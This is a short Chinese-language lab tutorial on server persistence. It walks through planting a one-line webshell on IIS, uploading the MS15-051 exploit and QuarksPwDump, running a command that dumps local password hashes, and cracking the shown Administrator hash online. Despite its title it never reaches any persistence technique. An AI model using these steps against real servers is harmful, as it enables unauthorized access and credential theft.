什么是权限维持
当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了。
由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门来维持权限,达到持续控制的目的。
实验环境:
- Windows Server 2008 R2 x64
- QuarksPwDump.exe
- IIS服务器
- 菜刀
- windows-kernel-exploits MS系列病毒
环境搭建:
开启IIS服务器,写入一句话木马使物理机能够访问
菜刀连接找到C:\Windows\Temp\
目录,将MS15-051的exp和QuarksPwDump.exe上传
模拟实验:
在菜刀终端输入C:\Windows\Temp\ms15-051x64.exe "C:\Windows\Temp\QuarksPwDump.exe --dump-hash-local"
获取到Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942:::
然后复制最后面的密文AFFFEBA176210FAD4628F0524BFE1942
在CMD5网站解密,成功拿到Administrator密码